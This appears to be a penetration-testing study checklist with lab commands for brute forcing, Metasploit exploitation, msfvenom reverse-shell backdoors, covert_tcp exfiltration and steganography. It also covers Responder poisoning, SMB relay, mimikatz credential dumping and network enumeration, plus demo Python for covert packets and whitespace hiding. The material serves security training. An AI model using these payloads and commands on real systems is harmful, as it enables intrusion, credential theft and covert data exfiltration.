spicy_pentest_checklist
xam2
20 November 2022 19:48
Hydra tool (binary names are lowercase on the command line):
hydra -L <users.txt> -P <passwords.txt> ftp://<ip>
Medusa:
medusa -h <ip> -U <users.txt> -P <passwords.txt> -M <module, e.g. ftp or ssh>
Vulnerability Assessments
nikto -h <ip> -Tuning <code>   (the tuning code selects which test classes run; the code list is in nikto -H)
System hacking with Metasploit
Run nmap service detection first (nmap -sV <ip>) so you search for the exact product and version
search <service name>        # for Samba on Metasploitable: search usermap_script
use <module path>            # e.g. exploit/multi/samba/usermap_script
show options
set RHOSTS <target ip> (older modules use RHOST) and set LHOST <attacker ip>
set payload <payload path>
exploit
Note: payload for usermap_script: cmd/unix/reverse
For UnrealIRCd on port 6667 use search unrealirc (exploit/unix/irc/unreal_ircd_3281_backdoor)
Backdooring through Metasploit
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=<ip> LPORT=<port> -f exe -o /path/payload.exe
Listening:
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT <port>      (must match the LPORT baked into the payload)
exploit
Adding PowerSploit for a VNC connection and evasion bypass (no steps recorded yet)
Hacking a Windows machine with a Microsoft Office document using TheFatRat (no steps recorded yet):
Privilege escalation enumeration with BeRoot
Once you have a meterpreter session, upload the BeRoot binary, drop to a shell and run it. BeRoot only reports candidate privilege-escalation paths (misconfigurations that can lead to SYSTEM/root); it does not escalate by itself, you still have to exploit what it finds.
Covert channels using covert_tcp
Compile covert_tcp.c first; the binary uses raw sockets, so run it as root on both ends:
cc -o covert_tcp covert_tcp.c
Receiver (start this one first; -dest, -source and the ports must be the same values on both sides, the server uses them to pick the covert packets out of the traffic):
./covert_tcp -dest <ip> -source <ip> -source_port <n> -dest_port <n> -server -file <path where the received file is saved>
Sender:
./covert_tcp -dest <ip> -source <ip> -source_port <n> -dest_port <n> -file <path of the file to send>
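Added example (not part of the original checklist and not covert_tcp's code): what the channel above actually does. covert_tcp's default mode puts one byte of the file into the IP identification field of each forged TCP SYN and the receiver filters packets by the agreed source/destination/port tuple. The script builds the same packets in memory, decodes them as a receiver would, and shows why the receiver must validate the IP checksum and the tuple before trusting a byte. Addresses, ports, the secret and the "noise" packet are constructed values; the exact placement of the byte in the high-order byte of the ID field (and of the sequence number in seq mode) is an assumption made for this example.

```python
"""Constructed example: hide bytes in the IP ID field of TCP SYN packets, the
way covert_tcp's default mode does (one payload byte per packet), and recover
them from raw packets. Nothing goes on the wire; packets are built and parsed
in memory so the encoding and the receiver's checks can be inspected."""
import socket
import struct


def ip_checksum(header: bytes) -> int:
    """RFC 791 one's-complement checksum over an IPv4 header.
    Over a header that already carries a correct checksum the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_packet(src: str, dst: str, sport: int, dport: int, ident: int, seq: int) -> bytes:
    """Minimal IPv4 header + 20-byte TCP SYN. Assumptions for the example:
    no IP options, TTL 64, TCP checksum left at 0 (the receiver never checks it)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, ident, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]   # fill in the checksum
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 8192, 0, 0)
    return ip + tcp


def encode(data: bytes, src: str, dst: str, sport: int, dport: int, field: str = "ipid"):
    """One packet per payload byte. 'ipid': byte in the high byte of the IP ID
    (covert_tcp -ipid). 'seq': byte in the high byte of the TCP ISN (covert_tcp -seq)."""
    if field == "ipid":
        return [build_packet(src, dst, sport, dport, b << 8, 0) for b in data]
    if field == "seq":
        return [build_packet(src, dst, sport, dport, 0, b << 24) for b in data]
    raise ValueError(field)


def decode(packets, src: str, dst: str, dport: int, field: str = "ipid") -> bytes:
    """Receiver side: keep only IPv4/TCP packets with a valid header checksum
    that match the agreed tuple, then pull the byte out of the agreed field."""
    out = bytearray()
    for pkt in packets:
        if len(pkt) < 40 or pkt[0] >> 4 != 4:
            continue
        ihl = (pkt[0] & 0x0F) * 4
        if ip_checksum(pkt[:ihl]) != 0 or pkt[9] != 6:        # corrupted header or not TCP
            continue
        if socket.inet_ntoa(pkt[12:16]) != src or socket.inet_ntoa(pkt[16:20]) != dst:
            continue
        tcp = pkt[ihl:ihl + 20]
        if struct.unpack("!H", tcp[2:4])[0] != dport:
            continue
        if field == "ipid":
            out.append(struct.unpack("!H", pkt[4:6])[0] >> 8)
        else:
            out.append(struct.unpack("!I", tcp[4:8])[0] >> 24)
    return bytes(out)


# Constructed demo traffic: the covert stream with one ordinary SYN to port 80
# mixed in, which the receiver must ignore because the tuple does not match.
SENDER, RECEIVER, SPORT, DPORT = "10.0.0.5", "10.0.0.9", 8888, 9999
SECRET = b"creds: admin/Winter2022"


def demo(field: str = "ipid") -> bytes:
    stream = encode(SECRET, SENDER, RECEIVER, SPORT, DPORT, field)
    noise = build_packet(SENDER, RECEIVER, 40000, 80, 0x1234, 0xDEADBEEF)
    return decode(stream[:5] + [noise] + stream[5:], SENDER, RECEIVER, DPORT, field)


if __name__ == "__main__":
    print(demo("ipid"))
    print(demo("seq"))
```

The throughput is one byte per packet, which is why the tool is slow for anything but small files, and the packets are plain SYNs with no data, which is what makes the channel hard to spot in flow logs but easy to spot with a per-host IP ID or ISN distribution check.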
Steganography:
snow -C -m "<message>" -p "<password>" <existing.txt> <new.txt>    # hide: -C compresses, -p encrypts the message
snow -C -p "<password>" <new.txt>                                   # extract
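Added example (not from the checklist and not SNOW's own code) of the trick SNOW relies on: text hidden in trailing whitespace, which editors and browsers do not show. The scheme here is deliberately simplified (space = 0, tab = 1, eight bits per line, 16-bit length prefix); SNOW packs bits differently and encrypts with ICE when -p is given, none of which is reproduced. The cover text and secret are constructed. The last function is the detection check a reviewer would run on a suspicious file.

```python
"""Constructed example of whitespace steganography (the channel SNOW uses):
message bits become trailing spaces/tabs on the cover text's lines."""

BITS_PER_LINE = 8


def hide(cover: str, message: bytes) -> str:
    """Append the message bits to the line ends of cover. Existing trailing
    whitespace is stripped first so the decoder only reads what we wrote;
    extra blank lines are appended when the cover is too short (as SNOW does)."""
    if len(message) > 0xFFFF:
        raise ValueError("message too long for the 16-bit length prefix")
    payload = len(message).to_bytes(2, "big") + message
    bits = "".join(format(b, "08b") for b in payload)
    lines = cover.split("\n")
    needed = -(-len(bits) // BITS_PER_LINE)          # ceil division: lines required
    lines += [""] * max(0, needed - len(lines))
    out, pos = [], 0
    for line in lines:
        chunk = bits[pos:pos + BITS_PER_LINE]
        pos += len(chunk)
        out.append(line.rstrip(" \t") + "".join("\t" if c == "1" else " " for c in chunk))
    return "\n".join(out)


def reveal(text: str) -> bytes:
    """Read the trailing whitespace of every line back into bits, then honour
    the length prefix so padding bits at the end are ignored."""
    bits = ""
    for line in text.split("\n"):
        tail = line[len(line.rstrip(" \t")):]
        bits += "".join("1" if c == "\t" else "0" for c in tail)
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))
    if len(data) < 2:
        return b""
    n = int.from_bytes(data[:2], "big")
    return data[2:2 + n]


def trailing_whitespace_lines(text: str) -> int:
    """Detection check: prose rarely ends most of its lines with spaces or
    tabs, so a high count (or a file with many trailing-whitespace-only
    lines) is the tell for this channel."""
    return sum(1 for line in text.split("\n") if line != line.rstrip(" \t"))


COVER = "Meeting notes\nAgenda was reviewed.\nNo further action."   # constructed cover text
SECRET = b"shell on 10.0.0.9"                                         # constructed secret


if __name__ == "__main__":
    stego = hide(COVER, SECRET)
    print(repr(stego))
    print(reveal(stego))
    print(trailing_whitespace_lines(COVER), trailing_whitespace_lines(stego))
```

Any tool that normalises whitespace (an editor with "trim trailing whitespace", a Git hook, a mail gateway re-wrapping text) destroys the hidden message, which is both the channel's main fragility and the simplest defensive measure.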
HOST Discovery
Linux tools:
Netdiscover
$ netdiscover -i <interface>
$ netdiscover -r <subnet>        (-r takes the range, e.g. 192.168.1.0/24; -i selects the interface)
NMAP
$ nmap -sn -PR [IP]
-sn: disable port scan; -PR: ARP ping scan (only works on the local subnet)
$ nmap -sn -PU [IP]
-PU: UDP ping scan
$ nmap -sn -PE [IP or IP range]
-PE: ICMP echo ping scan
$ nmap -sn -PP [IP]
-PP: ICMP timestamp ping scan
$ nmap -sn -PM [IP]
-PM: ICMP address mask ping scan
$ nmap -sn -PS [IP]
-PS: TCP SYN ping scan
Scanning:
NMAP
$ nmap -sV <ip> -vv -oA <outputname>      (-oA writes .nmap, .gnmap and .xml; -sn would skip the port scan entirely)
Ref: https://www.stationx.net/nmap-cheat-sheet/
To convert nmap XML output to HTML:
$ xsltproc ms2.xml -o ms2.html
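Added example (not from the checklist, not nmap's stylesheet): the xsltproc step above only renders the XML; when you need to filter or merge scans it is easier to parse the .xml directly. The script reads nmap's XML structure (host / status / address / ports / port / state / service) into a list of open ports and renders a small HTML table. The XML is a hand-written, trimmed sample in nmap's format, not real scan output, and the service banners in it are made up.

```python
"""Constructed example: turn an nmap -oX/-oA .xml file into a table of open
ports (the data behind the xsltproc HTML report) and render it safely."""
import html
import xml.etree.ElementTree as ET

# Hand-written sample in nmap's XML format; hosts, MACs and banners are invented.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -sV -oA ms2 192.168.72.139" version="7.93">
<host><status state="up" reason="arp-response"/>
<address addr="192.168.72.139" addrtype="ipv4"/>
<address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
<hostnames><hostname name="metasploitable" type="PTR"/></hostnames>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/>
<service name="ftp" product="vsftpd" version="2.3.4"/></port>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
<port protocol="tcp" portid="6667"><state state="open" reason="syn-ack"/>
<service name="irc" product="UnrealIRCd"/></port>
<port protocol="tcp" portid="8080"><state state="closed" reason="reset"/></port>
</ports></host>
<host><status state="down" reason="no-response"/>
<address addr="192.168.72.140" addrtype="ipv4"/></host>
</nmaprun>"""

COLUMNS = ("host", "hostname", "port", "proto", "service")


def parse_nmap_xml(text) -> list:
    """Return one dict per open port on each host that is up."""
    root = ET.fromstring(text.encode("utf-8") if isinstance(text, str) else text)
    rows = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                                  # skip hosts that did not answer
        addr = next(a.get("addr") for a in host.iter("address") if a.get("addrtype") == "ipv4")
        hn = host.find("hostnames/hostname")
        name = hn.get("name") if hn is not None else ""
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue                              # closed/filtered ports are noise here
            svc = port.find("service")
            parts = [svc.get(k) for k in ("name", "product", "version")] if svc is not None else []
            rows.append({"host": addr, "hostname": name, "port": int(port.get("portid")),
                         "proto": port.get("protocol"),
                         "service": " ".join(p for p in parts if p)})
    return rows


def to_html(rows) -> str:
    """Minimal HTML table. Every cell is escaped: banners and hostnames come
    from the scanned host, so they are attacker-controlled text that ends up
    in a report somebody opens in a browser."""
    head = "<tr>" + "".join(f"<th>{c}</th>" for c in COLUMNS) + "</tr>"
    body = "".join("<tr>" + "".join(f"<td>{html.escape(str(r[c]))}</td>" for c in COLUMNS) + "</tr>"
                   for r in rows)
    return f"<table>{head}{body}</table>"


if __name__ == "__main__":
    for row in parse_nmap_xml(SAMPLE_XML):
        print(row)
```

Replace SAMPLE_XML with open("ms2.xml").read() for real output; -oA gives you the .xml next to the .nmap and .gnmap files, and the same parser works across scans so results from several runs can be merged before reporting.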
PORT 21 enumeration:
First, get the product and version, e.g. vsftpd 2.3.4
Second, FTP has a common issue: anonymous login (username anonymous, password anonymous or any e-mail address)
Third, run a script scan and choose the scripts relevant to the service, e.g. nmap -p 21 --script "ftp-*" <ip>
If the version gives nothing in basic enumeration, search for the version on exploit-db.com
If you want to search locally, try with
Always skip the DoS scripts
If you do not have local access to the machine, choose the remote exploits for maximum results, if any are listed
DoS - ignore
webapps - check further
remote - for direct use
local - only if you already have some access on the target
PORT 22 enumeration:
Guess the username and password, then brute force (you need a username first; get it from somewhere else, e.g. hydra -L users.txt -P passwords.txt ssh://<ip>)
Legacy attack: keys generated with the Debian-patched OpenSSL 0.9.8 (CVE-2008-0166, before the 1.0 series) come from a tiny key space, so the user's private key can be brute-forced offline and used to log in
PORT 23 enumeration:
If a version is disclosed in the telnet banner, follow the same exploit-search steps as for FTP
SMB enumeration:
SMB versions: v1, v2, v3
Ports 137, 138, 139 (NetBIOS) and 445 (direct SMB)
Try anonymous (null session) or guest login
If you have a password, mount the share
Version-specific issues:
SMBv1 - EternalBlue (MS17-010); SMBv3.1.1 - SMBGhost (CVE-2020-0796); LLMNR/NBT-NS poisoning is not tied to an SMB version, it abuses name resolution and NTLM authentication
Other things to check on the same host: distcc, kernelmapper, portmapper (rpcbind), enum4linux
smbclient, smbmap
--script discovery
SambaCry (CVE-2017-7494, Samba named-pipe shared-library upload)
SMB enum using nmap scripts
$ nmap -p 445 --script smb-enum-sessions <IP>
$ nmap -p 445 --script smb-enum-shares <IP>
$ nmap -p 445 --script smb-os-discovery <IP>
$ nmap -Pn -n -p139,445 --script discovery 192.168.72.139
(scripts can be given by name; the full /usr/share/nmap/scripts/<name>.nse path also works; use -p 139,445 to cover both ports)
$ nmap -p 139,445 --script smb-double-pulsar-backdoor <IP>
SMB enum using smbclient and smbmap
$ smbclient -L //192.168.72.139 -N         (-N: no password, i.e. null session)
$ smbmap -H 192.168.72.139
$ smbclient //192.168.72.139/tmp -N
SMB enum using smbmap
$ smbmap -R tmp -H <ip>                    (-R: list the named share recursively)
You can also use -U <user>, -P <password>, -R <share> (recursive) and -r <share> (non-recursive listing); check the manual page
SMB enum using smbclient:
$ smbclient -L //<ip> -U <user>
Enum4linux: mostly used for Samba enumeration
Enumerate info from Windows and Samba hosts using enum4linux
enum4linux -u martin -p apple -n $ip
-n: do an nmblookup (similar to nbtstat)
// returns: target info, workgroup/domain, domain SID (security identifier), list of users with RIDs (relative identifiers)
enum4linux -u martin -p apple -P $ip
// password policy info
enum4linux -u martin -p apple -S $ip
// share list
enum4linux -a $ip runs all the simple checks (users, shares, groups, policy, OS) with a null session
Good resource covering everything discussed so far: https://github.com/irgoncalves/smbclient_cheatsheet
Windows tools:
NetScanTools Pro -> use the SMB scanner option
NetBIOS enumeration:
Tool: https://nbtenum.sourceforge.net/
nbtstat -a <ip>       (Windows only: NetBIOS name table of the remote machine)
nbtstat -c            (Windows only: the local NetBIOS name cache; takes no IP)
nbtscan <ip-range>    (Linux/Parrot)
Microsoft documentation: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat
You can also use nmap here:
nmap -sV -v --script nbstat.nse <ip>
nmap -sU -p 137 --script nbstat.nse <ip>
-sV: probe open ports to determine service/version info
NetBIOS enum using cmd:
nbtstat -a $ip      -a: NetBIOS name table of the remote computer
nbtstat -c          -c: NetBIOS name cache of the local computer
net use             shows connection status, mapped shares and network info; connects a computer to or disconnects it from a shared resource
NetBIOS enum using NetBIOS Enumerator or SuperScan (Windows GUI tools)
NetBIOS null session:
net use \\<ip>\IPC$ "" /user:""      (IPC$ is the classic null-session target; any share name can be tried)
SNMP enumeration:
snmp-check <ip>
nmap -sU -p 161 <ip>
Perform SNMP enum using snmp-check: first check whether SNMP is open
nmap -sU -p 161 $ip
// 161/udp open means the agent answers; snmp-check then tries the default "public" community string (-c to use another one)
snmp-check $ip
// gets system info, user accounts, network info, interfaces, routing info, listening ports, processes, storage, file systems, device info and shares
Perform SNMP enum using SoftPerfect Network Scanner: specify the range, discover devices, right-click > Properties for the details
SNMP 161 brute force (of community strings)
nmap -sU -p 161 --script=snmp-brute <ip>
Metasploit: auxiliary/scanner/snmp/snmp_login (brute-forces community strings), auxiliary/scanner/snmp/snmp_enum (dumps the tree once you have one)
Lab2-Task1: enumerate SNMP using snmp-check
nmap -sU -p 161 [IP]
snmp-check [IP]
Addition:
nbtstat -a [IP] (Windows)
nbtstat -c
DNS enumeration:
To get name server and mail server details:
$ dnsenum <domain>
To get the services (SRV records) on the target domain:
$ dnsrecon -t srv -d <domain>        (-t axfr attempts a zone transfer instead)
To get the name servers of the target domain:
$ fierce -dns <domain>               (newer fierce releases use fierce --domain <domain>)
Perform DNS enum
// collect DNS server names, hostnames, machine names, usernames, IP addresses and aliases in the target domain
Perform DNS enum using zone transfer (Linux terminal):
dig ns certifiedhacker.com
retrieves the name servers of the target domain (the ANSWER section); query the zone apex, not the www host
Try whether a zone transfer is possible:
dig @ns1.bluehost.com certifiedhacker.com axfr
axfr asks that server for the whole zone; a server that answers to an arbitrary client is misconfigured
Perform DNS enum of Windows DNS servers (cmd):
>nslookup
>set querytype=soa
soa: start of authority record, administrative info about the DNS zone
>certifiedhacker.com
>server ns1.bluehost.com
>ls -d certifiedhacker.com
ls -d requests a zone transfer of the domain from the selected server (ns1.bluehost.com, the primary name server)
Perform DNS enum using DNSSEC zone walking
// enumerates DNS records (MX, SOA, NS, A, AAAA, SPF, TXT)
dnsrecon -d certifiedhacker.com -z
-d: domain
-z: DNSSEC zone walk (follows the NSEC chain) in addition to the standard enumeration
LDAP enum:
Perform LDAP enumeration
.. generates a list of the distributed directory services on the target system
.. a directory service holds a hierarchical, logical tree of the network's components, from the list of printers to the corporate e-mail directory
.. in effect the company org chart
Perform LDAP enumeration using Active Directory Explorer (Sysinternals): connect with the IP and credentials
the complete AD tree is displayed and, with sufficient rights, can be modified too
Windows tool: Active Directory Explorer
RPC enum:
Perform RPC, SMB and FTP enumeration
rpc -> check for vulnerable services registered with the portmapper (port 111)
smb -> banner grabbing, OS details, service version
ftp -> check the FTP service and attack it: FTP bounce, FTP brute force and packet sniffing (FTP is cleartext)
Perform RPC & SMB enumeration using NetScanTools Pro
RPC - NetScanTools Pro
> Manual Tools
> *nix RPC Info
> target IP, target port 111
> Dump Portmap
> result: list of all registered daemons running on the target system
SMB - NetScanTools Pro
> SMB Scanner
> Add to list -> OK
> login credentials (username, password) > Add to list > OK
> click Get SMB Versions
> result: NetBIOS name, DNS name, SMB versions, shares
Perform RPC, SMB & FTP enumeration using nmap:
nmap -p 21 $ip
nmap -A $ip
nmap -A -p 445 $ip
(the Linux equivalent of Dump Portmap is rpcinfo -p $ip, or nmap -p 111 --script rpcinfo $ip)
NFS enum:
Perform NFS enumeration
NFS: access / view / store / update files on a remote server
After LDAP go for NFS: identify the exported directories, the list of clients connected to the server with their IP addresses, and the shared data associated with them
Exports are usually restricted by client IP only, so it may be possible to spoof the IP and get access to the shared resource
Perform NFS enumeration with superenum: check whether NFS is open
nmap -p 2049 $ip
NFS also needs other ports (111 rpcbind, mountd); showmount -e $ip lists the exports directly
echo $ip > target.txt
./superenum
// pass the filename target.txt; takes 15-20 minutes to complete
Perform NFS enumeration with RPCScan
git clone https://github.com/hegusung/RPCScan
python3 rpc-scan.py $ip --rpc
it lists the NFS service if it is open
System hacking:
Good references: https://github.com/SpiderLabs/Responder
https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b
RESPONDER
responder -I tun0        // afterwards crack the captured hashes: john <responder hash file>
Download the Responder tool
--> git clone https://github.com/lgandx/Responder
Launch Responder
--> python Responder.py -I eth0
--> check in the start-up banner that the LLMNR / NBT-NS / DNS / MDNS poisoners are ON
On the victim host, ask for a share name that does not exist (the failed lookup falls back to LLMNR/NBT-NS)
--> \\hackme
Attacker host (Responder)
--> receives the NTLMv2 hash of the victim (NTLMv2-SSP, written to the logs/ directory)
Crack the hash to get the password using hashcat
--> hashcat -m 5600 hashes.txt rockyou.txt -D1        (-m 5600 = NetNTLMv2, -D1 = CPU device)
--> hashcat -m 5600 hashes.txt rockyou.txt -D1 --show --user
SMB Relay (MultiRelay ships with Responder under tools/)
--> python MultiRelay.py -h
--> python MultiRelay.py -t <Target-IP> -u ALL
--> before running MultiRelay, turn OFF the SMB and HTTP servers in Responder.conf so Responder does not answer the authentication itself and the relay can
--> vim Responder.conf
--> the victim's authentication is received
--> and relayed to the target, giving access there as the victim (the target must have SMB signing not required; check with RunFinger first)
Dump passwords on the relayed target (commands in the MultiRelay shell):
--> help
--> mimi coffee
--> mimi sekurlsa::logonpasswords
RunFinger (fingerprints hosts and reports whether SMB signing is required, to pick relay targets)
--> Only works when SMB is disabled.
--> python RunFinger.py -h
--> python RunFinger.py -i 192.168.1.0/24
Reference
--> https://notsosecure.com/pwning-with-responder-a-pentesters-guide/
--> https://www.youtube.com/watch?v=rjRDsXp_MNk&ab_channel=RajganeshPandurangan
--> https://www.youtube.com/watch?v=LHv1ud5lnX0&ab_channel=Joostvan%27tZand